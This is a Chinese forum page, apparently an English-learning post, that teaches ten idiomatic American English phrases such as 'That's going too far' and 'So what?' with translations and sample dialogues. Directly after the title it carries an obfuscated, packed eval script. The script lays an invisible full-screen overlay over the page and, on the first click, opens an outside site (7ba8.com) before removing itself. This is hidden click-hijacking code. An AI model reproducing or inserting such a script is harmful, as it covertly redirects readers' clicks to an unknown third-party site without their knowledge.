让你口语脱颖而出的十句地道美语

<script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script>1. Do it yourself, then。
  既然如此,你自己来吧。【疯狂想像:别人抱怨你没做好的时候说!】
  A: That's not the way I wanted it done。
  这可不是我想要的方式。
  B: Do it yourself, then。
  那你自己来呗。
  2. That's more like it。
  这才像话。【疯狂想像:像个长者一样地说!】
  A: Don't talk to your brother that way!
  别跟你哥哥那么说话!
  B: I'm sorry I insulted you, Jimmy。
  对不起,我侮辱了你,吉米。
  A: That's more like it。
  那这像话。
  3. That's going too far。
  太过分了!
  A: Should I buy my girlfriend a car?
  我是不是该给我女朋友买部车呢?
  B: That's going too far。
  那太过分了!
  4. See. / I told you (so)。
  我老早告诉过你。【疯狂想像:洋洋得意地、有先见之明地说!】
  A: It was stupid of me to go bungee jumping。
  我居然去蹦极,真是太蠢了。
  B: See, I told you so。
  看,我早就这么说。
  5. So what?
  那又怎样?【疯狂想像:毫不在乎地说!】
  A: You're not wearing your seatbelt。
  你没系安全带。
  B: So what?
  那又怎样?
  6. I'm counting on you. / You're my only hope。
  就指望你了。【疯狂想像:可怜兮兮地说!】
  A: Sure, I'll come watch you give your speech。
  当然,我会来看你演讲的。
  B: Great, I'm counting on you!
  太好了,我就指望你了。
  7. Do something (about it) ! / Don't just sit there!
  想想办法吧!(别闲坐着!)
  A: Honey, the garbage needs to be taken out。
  亲爱的,垃圾该拿出去了。
  B: So, don't just sit there, go do something about it!
  那你就别光坐在那儿了,去做点事吧!
  8. Who do you think you are?
  你以为你是谁啊?!【疯狂想像:毫不客气地说!】
  A: You shouldn't talk to your children that way。
  你不该这么跟你的孩子们说话。
  B: Who do you think you are? Mind your own business。
  你以为你是谁啊?管好自己的事吧。
  9. Stop playing the fool. / Don't act stupid。
  别装傻了。
  A: Honey, would you please put the dishes in the dishwasher?
  亲爱的,你能把碗碟放进洗碗机里吗?
  B: I don't know how to run it。
  我不知道怎么操作。
  A: Stop playing the fool!
  别装傻了!
  10. Any complaints? / Do you have something to say?
  你有何不满?/你有什么话要说吗?
  A: Can I see the work schedule for next week?
  我能看看下星期的日程表吗?
  B: Here it is. Do you have something to say?
  这就是。你有什么要说吗?
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Copyright © 2020-2021 tigtag.com |网站地图  
快速回复 返回列表 返回顶部